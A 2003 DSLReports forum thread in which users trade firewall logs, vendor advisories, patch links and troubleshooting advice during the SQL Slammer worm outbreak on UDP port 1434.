"But now abide faith, hope, love, these three; but the greatest of these is love." (1 Cor. 13:13)]]> http://www.dslreports.com/forum/remark,5781186 Sat, 25 Jan 2003 22:06:02 EDT http://www.dslreports.com/forum/remark,5781156 Lurkers inc : I have to assume that my ISP, like many others have blocked udp to my port 1434 since my log is free of any of that kind of traffic since getting back online. Things got very slow for me before I lost connection to the internet a little less than a day ago on my home dsl connection and I could only get back on by switching the server I was trying to connect to. That could be unrelated but that has not happened before that I can recall.

This worm really packed a punch and spread quickly, lets hope it dies soon but that is unlikely in my opinion and may be wishful thinking.

Paul,
--
Hey, I don't block the ads, I just let Ad Zapper read them for me.]]> http://www.dslreports.com/forum/remark,5781156 Sat, 25 Jan 2003 22:01:36 EDT http://www.dslreports.com/forum/remark,5781149 Vin DSL : Sorry if this is a repeat, but I don't feel like reading through 13 pages...

The attack began at approximately 12:30 a.m. EST and is still on-going, although the effects appear to be subsiding. If you're into this kind of stuff, you might want to bookmark this link:

»average.matrixnetsystems.com/

The effects are plainly visible on the charts. Wild stuff...
_______]]> http://www.dslreports.com/forum/remark,5781149 Sat, 25 Jan 2003 22:01:14 EDT http://www.dslreports.com/forum/remark,5780708 psloss :

said by skj :

---

A more "conservative" view. :)

---

Maybe...it appears to be largely the AP wire story that Ted Bridis has been updating all day:

This link will end up redirecting if JavaScript is off:
»wire.ap.org/APnews/center_story.···7OPJQ5O0

If this doesn't go to the story, the headline is "Virus Overwhelms Global Internet Systems";

This link works for me without JavaScript; it goes to the main page:
»wire.ap.org/GoToAP.cgi

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5780708 Sat, 25 Jan 2003 21:14:47 EDT http://www.dslreports.com/forum/remark,5780623 skj :

said by scottkeen :

---

Thank goodness -- not another CNN link.

---

A more "conservative" view. :)]]> http://www.dslreports.com/forum/remark,5780623 Sat, 25 Jan 2003 21:05:24 EDT http://www.dslreports.com/forum/remark,5780571 scottkeen :

said by skj :

---

Fox news story. »www.foxnews.com/story/0,2933,76566,00.html

---

Thank goodness -- not another CNN link.]]> http://www.dslreports.com/forum/remark,5780571 Sat, 25 Jan 2003 21:00:54 EDT http://www.dslreports.com/forum/remark,5780548 skj : Fox news story. »www.foxnews.com/story/0,2933,76566,00.html]]> http://www.dslreports.com/forum/remark,5780548 Sat, 25 Jan 2003 20:59:04 EDT http://www.dslreports.com/forum/remark,5780388 diskus : wow just went to the microsoft sql site and no info on patches or anything about the worm is easily findable

sad]]> http://www.dslreports.com/forum/remark,5780388 Sat, 25 Jan 2003 20:43:46 EDT http://www.dslreports.com/forum/remark,5780142 Mark : I'd say you have 2 infected servers on your network segment bouncing traffic back and forth.]]> http://www.dslreports.com/forum/remark,5780142 Sat, 25 Jan 2003 20:22:20 EDT http://www.dslreports.com/forum/remark,5779868 justin : Is the UDP traffic marked "broadcast" somehow as well? there is a host on my vlan at nac.net, where I'm seeing all its UDP broadcasts ... even though neither its IP or the destination IPs are anything to do with me.

19:51:00.994563 209.123.109.159.4819 > 231.250.1.146.ms-sql-m: udp 376 [ttl 1]
19:51:01.001116 209.123.109.159.4819 > 235.175.81.200.ms-sql-m: udp 376 [ttl 1]
19:51:01.005485 209.123.109.159.4819 > 227.34.20.186.ms-sql-m: udp 376 [ttl 1]
19:51:01.015326 209.123.109.159.4819 > 237.164.177.27.ms-sql-m: udp 376 [ttl 1]
19:51:01.023023 209.123.109.159.4819 > 239.15.73.222.ms-sql-m: udp 376 [ttl 1]
19:51:01.024916 209.123.109.159.4819 > 229.19.233.170.ms-sql-m: udp 376 [ttl 1]
19:51:01.032194 209.123.109.159.4819 > 225.7.9.176.ms-sql-m: udp 376 [ttl 1]
19:51:01.033679 209.123.109.159.4819 > 233.43.131.243.ms-sql-m: udp 376 [ttl 1]
19:51:01.038025 209.123.109.159.4819 > 231.47.15.107.ms-sql-m: udp 376 [ttl 1]
19:51:01.044635 209.123.109.159.4819 > 235.204.226.42.ms-sql-m: udp 376 [ttl 1]

If this is any example of an infected host, its generating over a megabit of tiny packet traffic.
edit: the other odd thing is the TTL is 1 .. the packets won't last long with a TTL of just one hop.
[text was edited by author 2003-01-25 19:58:10]
]]> http://www.dslreports.com/forum/remark,5779868 Sat, 25 Jan 2003 19:56:48 EDT http://www.dslreports.com/forum/remark,5779853 graysonf : The gateway in/out of Alternet is up, but not the next hop in. I'd say they took their border router down.]]> http://www.dslreports.com/forum/remark,5779853 Sat, 25 Jan 2003 19:55:57 EDT http://www.dslreports.com/forum/remark,5779769 InTeRfeaRoN : hey what do you want to know. I have spent the last 5 hrs getting rid of this worm everyone here is talking about. I have cable and i feel like I am an xpert as of now.]]> http://www.dslreports.com/forum/remark,5779769 Sat, 25 Jan 2003 19:50:13 EDT http://www.dslreports.com/forum/remark,5779736 scottkeen : Does this mean it's a server at their location, or at UUNET, where they lease their OC-38 pipes?

edit: Alternet == UUNET

[text was edited by author 2003-01-25 19:49:20]
]]> http://www.dslreports.com/forum/remark,5779736 Sat, 25 Jan 2003 19:47:01 EDT http://www.dslreports.com/forum/remark,5779722 graysonf : A trace from here dies right at their gateway into/out of Alternet.]]> http://www.dslreports.com/forum/remark,5779722 Sat, 25 Jan 2003 19:45:23 EDT http://www.dslreports.com/forum/remark,5779712 jig : 16:31:03pig: GEN[00a0ccd3b68e0050] }S08>R06nD
16:24:43pig: IP[Src=24.48.236.203 Dst=24.55.48.160 UDP spo=01110 dpo=01434]}S07>R06nD
16:24:06pig: IP[Src=64.217.181.224 Dst=24.55.48.160 TCP spo=02800 dpo=00135]}S07>R02mD
15:57:32pig: GEN[00a0ccd3b68e0050] }S08>R06nD
15:47:51pig: GEN[00a0ccd3b68e0050] }S08>R06nD
15:45:10pig: IP[Src=218.30.21.193 Dst=24.55.48.160 UDP spo=01187 dpo=01434]}S07>R06nD
15:43:25pig: IP[Src=10.58.87.226 Dst=24.55.48.160 UDP spo=00067 dpo=00068]}S05>R01mD
15:39:46pig: IP[Src=63.193.133.36 Dst=24.55.48.160 UDP spo=04738 dpo=00135]}S07>R06nD
15:39:22pig: IP[Src=63.193.133.36 Dst=24.55.48.160 UDP spo=04738 dpo=00135]}S07>R06nD
15:39:18pig: IP[Src=63.193.133.36 Dst=24.55.48.160 UDP spo=04738 dpo=00135]}S07>R06nD
15:39:16pig: IP[Src=63.193.133.36 Dst=24.55.48.160 UDP spo=04738 dpo=00135]}S07>R06nD
15:08:43pig: GEN[00a0ccd3b68e0050] }S08>R06nD
14:47:20pig: GEN[00a0ccd3b68e0050] }S08>R06nD
14:35:59pig: IP[Src=218.252.172.201 Dst=24.55.48.160 UDP spo=03325 dpo=01434]}S07>R06nD
14:35:55pig: IP[Src=10.58.87.226 Dst=24.55.48.160 UDP spo=00067 dpo=00068]}S05>R01mD
14:31:06pig: GEN[00a0ccd3b68e0050] }S08>R06nD
14:28:52pig: IP[Src=66.28.221.143 Dst=24.55.48.160 UDP spo=02336 dpo=01434]}S07>R06nD
14:23:13pig: IP[Src=218.30.21.193 Dst=24.55.48.160 UDP spo=01187 dpo=01434]}S07>R06nD
14:09:52pig: IP[Src=24.55.48.196 Dst=24.55.48.160 TCP spo=01250 dpo=00139]}S07>R02mD
14:09:40pig: IP[Src=24.55.48.196 Dst=24.55.48.160 TCP spo=01250 dpo=00139]}S07>R02mD
14:09:34pig: IP[Src=24.55.48.196 Dst=24.55.48.160 TCP spo=01250 dpo=00139]}S07>R02mD
14:09:31pig: IP[Src=24.55.48.196 Dst=24.55.48.160 TCP spo=01250 dpo=00139]}S07>R02mD
14:06:34pig: IP[Src=24.30.155.142 Dst=24.55.48.160 TCP spo=03142 dpo=00080]}S07>R02mD
14:06:31pig: IP[Src=24.30.155.142 Dst=24.55.48.160 TCP spo=03142 dpo=00080]}S07>R02mD
14:00:51pig: IP[Src=10.10.1.108 Dst=24.55.48.160 UDP spo=01035 dpo=01434]}S05>R01mD
13:47:36pig: GEN[00a0ccd3b68e0050] }S08>R06nD
13:42:46pig: IP[Src=24.80.222.73 Dst=24.55.48.160 TCP spo=01338 dpo=00080]}S07>R02mD
13:42:43pig: IP[Src=24.80.222.73 Dst=24.55.48.160 TCP spo=01338 dpo=00080]}S07>R02mD

sorry about the post, but the information is basically that port 1434 is still available in adelphia.net, and that the hits i've gotten have dropped of considerably since early this morning.

in other news, ucla was heavily hit (at least parts of it), and i don't think i was ever NOT able to connect to usc, but a friend still cant get into his email at ucla.

-jig]]> http://www.dslreports.com/forum/remark,5779712 Sat, 25 Jan 2003 19:44:03 EDT http://www.dslreports.com/forum/remark,5779681 scottkeen : I still can't get to my server at the co-lo data center.

Can anyone tell where the problem is? My co-lo data center is »www.awwm.com

Is the problem with one of the hops, or some server at the data center?

I know there are several SQL Servers co-lo'd at the data center, including my own.

I may have to take a trip to install SP3 in-person, but I'd rather not if I don't have to. However, I'm quite sure I applied the hotfix, as I'm very diligent about such things.

So, just wondering if anyone can tell where the problem is in the pipeline.]]> http://www.dslreports.com/forum/remark,5779681 Sat, 25 Jan 2003 19:40:51 EDT http://www.dslreports.com/forum/remark,5779627 graysonf :

said by justin :

---

If someone was collecting all the source IP addresses as it hit a range of IPs they controlled, they could build themselves a nice list of unpatched mysql servers. Although most servers will be patched now to save them, some might burble on for weeks until someone notices a full pipe or a slow query.

---

Well, I have such a list of the ones that hit me. And there are sites like incidents.org that have info too, from anyone who submits logs to them like I do.

Stats for the day so far:

80384 infected hosts, hitting 161182 victims, 7159564 times.

[text was edited by author 2003-01-25 19:38:47]
]]> http://www.dslreports.com/forum/remark,5779627 Sat, 25 Jan 2003 19:35:53 EDT http://www.dslreports.com/forum/remark,5779618 Marilla :

said by stevelee0 :

---

I've noticed that the normal background level of 80/tcp scanning from possibly infected ATTBI-connected hosts have disappeared... interesting...

---

hehe.. well, figure that some of that is from automated zombie attacks from servers that still exist which perhaps have STILL not been patched for things like Code Red or even other older things.

Some people will get this software and install everything on some 'old' box, and stick it in a corner, and forget it. I have a 'test' server myself, but I keep it just as up-to-date as the 'real' ones (which is to say I had also failed to update IT with SQL SP3, but at least it's behind a NAT).. err.. where was I?

oh.. yeah.. most likely, many of those servers were vulnerable to THIS, too, and just got squashed by it, perhaps. or something!]]> http://www.dslreports.com/forum/remark,5779618 Sat, 25 Jan 2003 19:34:58 EDT http://www.dslreports.com/forum/remark,5779583 stevelee0 : I've noticed that the normal background level of 80/tcp scanning from possibly infected ATTBI-connected hosts have disappeared... interesting...

(as I posted this, I got my first 80/tcp hit from 12.230.x.x -- the 1434/udp traffic must be dying down :( )
[text was edited by author 2003-01-25 19:35:55]
]]> http://www.dslreports.com/forum/remark,5779583 Sat, 25 Jan 2003 19:31:58 EDT http://www.dslreports.com/forum/remark,5779539 graysonf : Down to 15 per hour now, it peaked at 224. But I have 7 IPs that saw it. 1006 hits total for the day as of now, from 607 unique hosts.]]> http://www.dslreports.com/forum/remark,5779539 Sat, 25 Jan 2003 19:27:29 EDT http://www.dslreports.com/forum/remark,5779519 Marilla :

said by Trel :

---

Well, without me having to read that much, does this affect MySQL at all?

---

No, it doesn't.]]> http://www.dslreports.com/forum/remark,5779519 Sat, 25 Jan 2003 19:24:49 EDT http://www.dslreports.com/forum/remark,5779516 brian_sch : Microsofts Patch for this is SP3]]> http://www.dslreports.com/forum/remark,5779516 Sat, 25 Jan 2003 19:24:41 EDT http://www.dslreports.com/forum/remark,5779512 justin : If someone was collecting all the source IP addresses as it hit a range of IPs they controlled, they could build themselves a nice list of unpatched mysql servers. Although most servers will be patched now to save them, some might burble on for weeks until someone notices a full pipe or a slow query.]]> http://www.dslreports.com/forum/remark,5779512 Sat, 25 Jan 2003 19:24:32 EDT http://www.dslreports.com/forum/remark,5779501 Marilla :

said by psloss :

---

Someone I know got infected and it filled up his T1 outbound.

---

My one infected server brought down an entire ISP hosted on three full T1's.. it was the only server running SQL Server. Everything's fine now, but... ehh.. it's definitely an 'efficient' worm!]]> http://www.dslreports.com/forum/remark,5779501 Sat, 25 Jan 2003 19:23:16 EDT http://www.dslreports.com/forum/remark,5779404 SparkChaser : Down to about 5/hour on Comcast here in PA. It was never real bad, maybe 15/hour. They're from all over from AT&T and HP to colleges in Mexico and Austria.]]> http://www.dslreports.com/forum/remark,5779404 Sat, 25 Jan 2003 19:14:09 EDT http://www.dslreports.com/forum/remark,5779373 psloss :

said by graysonf :

---

It's able to generate a lot of traffic because it's UDP which doesn't need to wait for handshakes or ACKs like TCP does.

Someone I know got infected and it filled up his T1 outbound. So it's fast for sure.

---

There are a few pages with the disassembled code; here's a post from earlier in the thread:
»Re: New Worm - UDP 1434 - SQL Server Monitor??

said by graysonf :

---

I wonder if the source addresses are real or generated to be bogus?

---

This one doesn't, but the nature of the worm (single UDP packet) means that the source IP could be spoofed with little extra effort. (Unfortunately)

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5779373 Sat, 25 Jan 2003 19:10:22 EDT http://www.dslreports.com/forum/remark,5779327 Trel : What's sad is that I am still the only one who goes to my site. The logs show me as the only one who goes.

Well, without me having to read that much, does this affect MySQL at all?
--
My teacher asked the square root of Pi. I thought the answer was 2 slices.]]> http://www.dslreports.com/forum/remark,5779327 Sat, 25 Jan 2003 19:04:59 EDT http://www.dslreports.com/forum/remark,5779275 graysonf : It's able to generate a lot of traffic because it's UDP which doesn't need to wait for handshakes or ACKs like TCP does.

Someone I know got infected and it filled up his T1 outbound. So it's fast for sure.

I'd be curious as to if, it was facing another box directly that was properly numbered (say a whole /8), on fast ethernet, could it fill up a 100Mbps link? Or even a GigE?

I wonder if the source addresses are real or generated to be bogus?

So far, I have over 1000 hits from this. But it's down to about 30 per hour now.]]> http://www.dslreports.com/forum/remark,5779275 Sat, 25 Jan 2003 18:59:35 EDT http://www.dslreports.com/forum/remark,5779209 Marilla : Just to flood the 'airwaves' with yet more data.. .but I'll keep this quick:

While offline (NIC unplugged), my one infected server was patched, rebooted, and plugged back in, and is now fine; as reported, there are no effects lingering past a reboot (or likely, even past a cycle of the SQL Server service itself... though it makes sense to reboot the whole machine anyway)]]> http://www.dslreports.com/forum/remark,5779209 Sat, 25 Jan 2003 18:51:49 EDT http://www.dslreports.com/forum/remark,5779191 Marilla :

said by graysonf :

---

I have a block of 8 IP addresses, and when I look in my log, they are being probed by the worm in sequence, lowest to highest. Maybe it's the starting address that is randomly generated, and it climbs up from there?

---

Most likely it's something like that exactly..

For example, if it generates randomly the first three parts of the quad... say 192.168.0 then it can VERY quickly cycle through all 256 addresses in that block. Giving the tiny size of this worm, and the flood of information it's sending nevertheless (meaning it's sending a LOT of attacks per minute), I wouldn't doubt if they did it such that it generates the first three, then just cycles the last of the quad all the way from 0 to 255.. or 1 to 254, or whatever.. hehe.]]> http://www.dslreports.com/forum/remark,5779191 Sat, 25 Jan 2003 18:49:55 EDT http://www.dslreports.com/forum/remark,5778788 graysonf : There are several write-ups on this worm out already that analyze how it works. But the short answer to your question is that there is a random number generator in the code that creates target IP addresses. But I have some doubts about how this really works.

I have a block of 8 IP addresses, and when I look in my log, they are being probed by the worm in sequence, lowest to highest. Maybe it's the starting address that is randomly generated, and it climbs up from there?

[text was edited by author 2003-01-25 18:12:34]
]]> http://www.dslreports.com/forum/remark,5778788 Sat, 25 Jan 2003 18:08:23 EDT http://www.dslreports.com/forum/remark,5778770 redstepchild : of the worm on it. I have ATTBI too!
--
RedStepChild@dslr.net]]> http://www.dslreports.com/forum/remark,5778770 Sat, 25 Jan 2003 18:06:46 EDT http://www.dslreports.com/forum/remark,5778736 spweber1954 : I tried this in another post, but didn't get a response.

Forgive me for trying in this thread---its more active...

Simple question:

How exactly does my unique IP get "pinged" from such a "worm". I'm on ATTBI and my IP is 12.###.###.## Does the worm just start at 12.000.000.01 and increment from there, thus "pinging" everyone?

My LinkViewer shows I've been tapped on port 1434 over 360 times since about 11pm last night. It has definitely slowed down over the day--but it got me to wondering exactly how my unique IP (at least I'm thinking its totally unique) get's pinged. My IP has been the same for over a year now, even though I have DHCP.

Thanks in advance,

Stan]]> http://www.dslreports.com/forum/remark,5778736 Sat, 25 Jan 2003 18:04:09 EDT http://www.dslreports.com/forum/remark,5778581 sfboarders : Thanks for the heads up. Looks like I am ok (hopefully). I have not forwarded port 1434.:)]]> http://www.dslreports.com/forum/remark,5778581 Sat, 25 Jan 2003 17:48:40 EDT http://www.dslreports.com/forum/remark,5778532 KevNYC : Is anyone else getting hits on TCP Port 3465?]]> http://www.dslreports.com/forum/remark,5778532 Sat, 25 Jan 2003 17:43:57 EDT http://www.dslreports.com/forum/remark,5778514 psloss :

said by Marilla :

---

Yep.. you are reading that right.. I hadn't recalled.. but that text says exactly what you suggest: no SP3 for MSDE yet, but you can apply the specific hotfix.

---

Looks like the hotfix requires SP2, according to the bulletin...

(Just want to make it clear: this is only for SQL Server 2000 Desktop Edition, a.k.a. MSDE 2000.)

SP2:
»www.microsoft.com/sql/downloads/2000/sp2.asp

The last rollup/cumulative patch for SP2 is here; that may include this hotfix:
»support.microsoft.com/default.as···=Q316333

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5778514 Sat, 25 Jan 2003 17:42:53 EDT http://www.dslreports.com/forum/remark,5778415 Marilla : Yep.. you are reading that right.. I hadn't recalled.. but that text says exactly what you suggest: no SP3 for MSDE yet, but you can apply the specific hotfix.

Hopefully *crosses fingers* your LAN's firewall has been blocking attempts to connect in anyway, or perhaps you even have NAT... a situation like you describe could, in fact, get ugly.

Apparently.. *blushes* my own infected server brought down an entire ISP all by itself. Of course, it's a smaller ISP with twin T1's powering it... so no big surprise there. At least I know the machine has the muscle to more than handle all the traffic that could be run through it! hehe]]> http://www.dslreports.com/forum/remark,5778415 Sat, 25 Jan 2003 17:33:39 EDT http://www.dslreports.com/forum/remark,5778379 psloss :

said by Marilla :

---

I believe the patch works for it as well. If not SP3, then the specific vulnerability's hotfix had something for the desktop engine too, I'm fairly sure.

---

Hmmm...not sure...at least here's what the English download page for SP3 says:
"SQL Server 2000 Desktop Engine (MSDE) -- Available Soon"

»www.microsoft.com/downloads/deta···ylang=en

I'm going to try just the hotfix:
»www.microsoft.com/technet/securi···-039.asp

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5778379 Sat, 25 Jan 2003 17:30:29 EDT http://www.dslreports.com/forum/remark,5778372 Marilla :

said by sfboarders :

---

Thanks guys for the quick response. Is there a way that I can tell if this worm has been trying to hit my network, Like a command prompt command? or any free program? Or any logs on Windows, Netgear RT314?

---

Most likely, you HAVE been hit by some probes from this, unless the pseudo-random thing put together for this simply isn't capable of producing your IP. Also most likely, your ISP has begun blocking communications on port 1434, so you might not see MANY more... though will could still see hits from other people who are also 'behind' your ISP's same firewalls as you.

Your RT314 is most likely blocking ALL of these attempts from reaching your computers UNLESS you have port forwarding or the 'Demilitarized Zone' features being used. Port forwarding would only expose you if you set it to forward port 1434. The Demilitarized Zone basically forwards ALL incoming connections to one of the computers on your network... if you did that, you basically have no protection whatsoever from your RT314 at all; Worse than that, the 'Demilitarize Zone' thing is mis-leading: It gives the impression that the rest of your computers are still protected. They are not: Because the 'DMZ' computer is exposed entirely to the Internet, but ALSO is on the local network with your other computers, that could expose some ugly stuff, perhaps.

Likely, though, you haven't used that feature.. I hope. If you need incoming connections, use port forwarding and only forward the ports you NEED open.

That said, you'll want to check out the admin site on your router (possibly you reach it by going to »192.168.0.1 on your web browser) to see if it is keeping a log of intrusion attempts. That's your best bet.]]> http://www.dslreports.com/forum/remark,5778372 Sat, 25 Jan 2003 17:29:11 EDT http://www.dslreports.com/forum/remark,5778194 sfboarders : Thanks guys for the quick response. Is there a way that I can tell if this worm has been trying to hit my network, Like a command prompt command? or any free program? Or any logs on Windows, Netgear RT314?
--
What!!!What!!!!What!!! What the hell do you want?!?!?! Leave my ass alone!!!:):):)]]> http://www.dslreports.com/forum/remark,5778194 Sat, 25 Jan 2003 17:15:45 EDT http://www.dslreports.com/forum/remark,5778151 Marilla :

said by AS400Dave :

---

It looks like this monster also affects the Desktop edition (something we have a bunch of at my company). A few of these on the local network can bring down Gigabit connections.

Anybody know what to do with Desktop Edition?

---

I believe the patch works for it as well. If not SP3, then the specific vulnerability's hotfix had something for the desktop engine too, I'm fairly sure.]]> http://www.dslreports.com/forum/remark,5778151 Sat, 25 Jan 2003 17:11:23 EDT http://www.dslreports.com/forum/remark,5778140 Randy Bell : from a Wilders post by FanJ: »www.wilderssecurity.com/index.ph···dseen=1

said by Trend Micro:

---

WORM_SQLP1434.A attacks targets systems using Microsoft SQL Server 2000, allowing affected SQL Servers to send the malicious packet to other SQL Servers and thereby causing a slowdown, or even failure, in the affected network.

The code that executes the denial-of-service attack resides only in memory of affected Microsoft SQL servers, and there are no file counterparts. Because of this, antivirus scanners that do not support memory scanning will not be able to detect the code.

There is no pattern file required.

Trend Micro strongly advises customers to download the latest fix patch supplied by Microsoft, updated on January 17, 2003. The patch is found on this site, »www.microsoft.com/sql/downloads/···sp3.asp

For more information on WORM_SQLP1434.A please visit our Web site at:
»www.trendmicro.com/vinfo/virusen···LP1434.A

---

said by Sophos:

---

SOPHOS WARNS OF SQLSLAMMER INTERNET WORM

Sophos is advising companies to ensure their systems are up-to-date with the latest security patches in response to a new internet worm called W32/SQLSlam-A or SQLSlammer.

The worm relies upon a security vulnerability in some versions of Microsoft SQL server, and creates traffic on UDP port 1434.

Sophos advises companies to ensure their systems are up-to-date with the latest security patches, including the patch from Microsoft to protect against the vulnerability exploited by the worm:
»www.microsoft.com/technet/securi···039.asp

Sophos has posted more information about the worm at
»www.sophos.com/link/slammer

---

--
"But now abide faith, hope, love, these three; but the greatest of these is love." (1 Cor. 13:13)
[text was edited by author 2003-01-25 17:17:40]]]> http://www.dslreports.com/forum/remark,5778140 Sat, 25 Jan 2003 17:10:27 EDT http://www.dslreports.com/forum/remark,5778133 Marilla :

said by scottkeen :

---

Edit -- heheh, marilla beat me to it. ditto.

---

I just have one thing to say:

PFFFFFFTTT!! I am the board-posting Champion!!! Especially since I've nothing better to do while waiting for my VERY helpful ISP tech - who is much closer to the server than I - to go patch and reboot it for me. *sighs*]]> http://www.dslreports.com/forum/remark,5778133 Sat, 25 Jan 2003 17:09:28 EDT http://www.dslreports.com/forum/remark,5778132 AS400Dave : It looks like this monster also affects the Desktop edition (something we have a bunch of at my company). A few of these on the local network can bring down Gigabit connections.

Anybody know what to do with Desktop Edition?]]> http://www.dslreports.com/forum/remark,5778132 Sat, 25 Jan 2003 17:09:25 EDT http://www.dslreports.com/forum/remark,5778112 scottkeen : This is a vulnerability that affects Microsoft SQL Server 2000 (MSSQL) with SP2 or older.

It does NOT affect MySQL -- a different database product.

Edit -- heheh, marilla beat me to it. ditto.

[text was edited by author 2003-01-25 17:07:46]
]]> http://www.dslreports.com/forum/remark,5778112 Sat, 25 Jan 2003 17:07:03 EDT http://www.dslreports.com/forum/remark,5778098 Marilla : If you are running MYsql and not Microsoft SQL Server, then you are perfectly fine.

But note that often people confuse the two because the common abbreviation MSSQL gets confused with MYSQL. Assuming you know the difference between the two, you are fine.]]> http://www.dslreports.com/forum/remark,5778098 Sat, 25 Jan 2003 17:06:27 EDT http://www.dslreports.com/forum/remark,5778083 sfboarders : A couple of questions. I am running a Windows 2000 Adv. Server with IIS and a MySQL database with SP3 web server. Should I be OK??? Is there a possibility that I could be infected? Also how can I tell if I have been hit??? Thanks in advance.
--
What!!!What!!!!What!!! What the hell do you want?!?!?! Leave my ass alone!!!:):):)]]> http://www.dslreports.com/forum/remark,5778083 Sat, 25 Jan 2003 17:04:50 EDT http://www.dslreports.com/forum/remark,5777991 Marilla :

said by psloss :

---

...it's easy to disinfect -- just stop the SQL Server service...Just verified that on my WinME test system that I deliberately infected.

---

I'm chalking this up as a lesson learned myself. All of the MS bashers/"Idiot Server Admin" bashers aside, I DO try to be very diligent about keeping up-to-date on patches and such, but no one is perfect. Had this not happened this morning, I would have otherwise learned of the SQL SP3 on my next semi-weekly run through the update pages, since somehow the Microsoft notification service about these security fixes did not send me the notification last Friday.

And I missed the original because I had wrongly assumed that SP2 would have all of the prior hotfixes in it, so I didn't bother to go one-by-one to check all of them to make sure. Looking into things, it seems as though my system would have been safe from permanent damage even if this worm had attempted to do something, because the context under which the SQL Service on my machine runs has very few permissions for writing... I suppose it could have wiped the databases themselves if it wanted to, but that would simply have caused a loss of less than a day, since that server does backups on Fridays (as well as other days).

The lesson I've learned? Don't rely on a third-party to inform me of patches - even if that third party is the party that creates the patches to begin with. I suspect that the only reason this came out now was due to SP3 itself drawing attention to the various exploits that were there... in almost all such cases lately, fixes for these things have existed for quite some time when the attacks actually come. When we choose to put servers on the Internet, we assume a certain amount of responsibility to assure that these servers are, at least, doing no harm to the network they are on or the Internet itself. Aside from a tiny infection once with Klez, this has been my only modern-day 'slip-up' in this department, and hopefully it will bring back the diligence I should be attending to this stuff with!

Blerg!


[text was edited by author 2003-01-25 16:56:41]
]]> http://www.dslreports.com/forum/remark,5777991 Sat, 25 Jan 2003 16:55:22 EDT http://www.dslreports.com/forum/remark,5777877 psloss :

said by Motumbo :

---

DrWeb seems to be the only scanner who is able to detect and disinfect this worm in memory.

---

Infected systems need to be patched, or the worm will keep requiring disinfection. The biggest advantage to the local scanner would be detecting that the worm is on the system. But it's easy to disinfect -- just stop the SQL Server service. Should be able to do that from the Services control panel applet in Windows 2000/XP or via the SQL Server Service manager program that sits in the task tray. Just verified that on my WinME test system that I deliberately infected.

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5777877 Sat, 25 Jan 2003 16:42:53 EDT http://www.dslreports.com/forum/remark,5777862 Randy Bell :

said by Motumbo and DrWeb:

---

To avoid infection by Win32.SQL.Slammer.376 DialogueScience, Inc. urgently recommends to block UDP port 1434 for access from outside and download and install Microsoft SQL 2000 service pack 3, (the latest patch for it was released on January 17, 2003).

---

Microsoft SQL 2000 service pack 3
»www.microsoft.com/sql/downloads/···sp3.asp
--
"But now abide faith, hope, love, these three; but the greatest of these is love." (1 Cor. 13:13)
[text was edited by author 2003-01-25 16:43:01]]]> http://www.dslreports.com/forum/remark,5777862 Sat, 25 Jan 2003 16:39:41 EDT http://www.dslreports.com/forum/remark,5777815 Marilla :

said by scottkeen :

---

Oh. So this is why my co-lo is timing out.

I have SP2 on my SQL server at the co-lo. I'll install SP3 as soon as I can get a TS connection to my server.

Question: How do I disable the SQL Server Monitoring service that uses port 1434? Is it just a Windows service that I set to Disable or Manual?

I do need 1433 so I can remote manage the SQL Server databases -- but I do not need 1434, correct?

Thanks
[text was edited by author 2003-01-25 15:58:19]

---

You're in the same boat as I am here... luckily, a tech at my co-loc facility is able to go to the location and to the patch for me.

The trouble is that unless the server is patched, it should not be allowed to connect to the 'net at all. Or if the SQL Service could be shut down... if they just reboot your server to let you get a TS session, it will likely get infected again immediately unless SQL is shut down, OR they block 1434 at the border AND no other systems behind it are infected as well.

The best thing to do is to be local, get the thing patched, then reboot.

As far as the port itself... I had initially thought that there was an option in SQL Server to turn this off, but the option I had set did not do so; I was able to get a port scan result on UDP 1434 from my server (it took lots of tries due to the unintentional DDoS nature of this worm)..

I see no service that can be shut off, nor any setting anywhere to disable this. Actually it's even possible that to connect to the server via Enterprise Manager that both 1433 and 1434 are needed.

Another thing to consider for the future is something I'd already done... change the 1433 port for SQL Server to something else. THAT can be done in the Server Network Utility... that alone can prevent attacks from succeeding in the future that may target the service itself, as well as preventing people from too easily being able to find your service to make attacks on it.]]> http://www.dslreports.com/forum/remark,5777815 Sat, 25 Jan 2003 16:34:35 EDT http://www.dslreports.com/forum/remark,5777672 Motumbo : DrWeb seems to be the only scanner who is able to detect and disinfect this worm in memory.

Win32.SQL.Slammer.376 or the second advent of CodeRed

[Jan 25, 2003]

Around 8 AM, Moscow time, on January 25 the Virus Alert Service of DialogueScience, Inc. received information that several major Internet servers in the Republic of Korea encountered serious problems. Many of them have become completely unresponsive. The same thing occurred in different parts of the world. In just a few hours the server world was braught to its knees by 376 bytes of the viral code. Many Internet transactions and especially Internet commerce were practically paralyzed.

Win32.SQL.Slammer.376 is an Internet-worm (also known as WORM_SQLP1434.A, DDOS_SQLP1434.A, SQL Slammer Worm, SQLP1434.A, W32/SQLSlammer, W32.SQLExp.Worm, Worm.SQL.Helkern, DDOS.SQLP1434.A, W32/SQLSlammer). It is the second "bodyless" virus after infamous Win32.CodeRed.3569. It does not exist as a file on the infected machine, neither spreads it in the form of a file throughout the network. It penetrates the memory context of Microsoft SQL Server and launches its own viral code - an endless cycle which generates a huge network traffic attacking randomly composed IP- addresses. Due to this peculiarity it is impossible to detect and cure it by standard anti-virus methods. Anti-virus software scanning files and controlling file operations are unable to detect this worm as it exists in the form of network packets only or a program code executed in memory.

The worm targets Microsoft SQL Server 2000. To penetrate the system it makes use of the security vulnerability of these servers (see details…), namely a buffer overrun, thanks to which an attacker can get control over the affected system within the context of rights attributed to MS SQL Server.

The worm sends 376 bytes of its code in packets 384 bytes long to UDP port 1434 which onsiderably decreases the server performance and its subsequent shutdown. This way of viral dissemination inevitably leads to DoS attacks against other servers in the Web.

To avoid infection by Win32.SQL.Slammer.376 DialogueScience, Inc. urgently recommends to block UDP port 1434 for access from outside and download and install Microsoft SQL 2000 service pack 3, (the latest patch for it was released on January 17, 2003).

Dr.Web® anti-virus scanner is the only Russian anti-virus program capable of detecting the virus in memory. If the scanner is set to automatically check the memory when it is launched (default settings), it will detect and disinfect Win32.SQL.Slammer.376, terminating the infected Microsoft SQL Server process.

For a more detailed description of the worm visit our site later.

